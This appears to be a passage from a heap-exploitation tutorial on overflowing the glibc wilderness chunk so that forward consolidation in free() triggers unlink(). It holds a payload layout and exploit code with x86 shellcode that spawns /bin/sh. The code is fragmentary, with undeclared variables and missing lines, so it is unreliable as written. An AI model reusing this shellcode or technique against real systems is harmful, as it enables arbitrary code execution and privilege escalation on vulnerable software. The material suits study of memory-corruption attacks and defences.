Now that we have determined what is impossible, let's have a look at what
we can do when involving the wilderness and free():
/* START wilderness3b.c */
#include <stdio.h>
The general aim of this contrived example is to avoid the special 'top'
code discussed above. The wilderness can be overflowed at [A], but this
is directly followed by a call to free(). Fortunately, the chunk to be
freed is not bordering the wilderness, and thus the 'top' code is not
invoked. To exploit this we will be using forward consolidation at [B],
the first call to free().
/* consolidate forward */
if (!(inuse_bit_at_offset(next, nextsz)))
{
sz += nextsz;
At the first call to free() 'next' points to our 'second' buffer. This
means that the test for forward consolidation looks at the size value
of the wilderness. To trigger the unlink() on our 'next' buffer we need
to overflow the wilderness' size field to clear the PREV_INUSE bit. Our
payload will look like this:
|FFFFBBBBDDDDDDDD...DDDDDDDD|SSSSWWWWWWWWWWWWWWWW...|
/* START exploit3b.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
p = payload;
memset(p, '\x90', 1052);
p += sizeof(shellcode) + 32;
*(long *) p = -4;
p += 4;
*(p) = '\0';
- ------------------------------------
- ------------------------------------
- ------------------------------------
[1] http://www.phrack.org/show.php?p=61&a=6
[2] http://www.phrack.org/show.php?p=57&a=8
[3] http://www.phrack.org/show.php?p=57&a=9
[4] http://gee.cs.oswego.edu/dl/html/malloc.html
[5] http://www.memorymanagement.org/glossary/f.html#fencepost
- ------------------------------------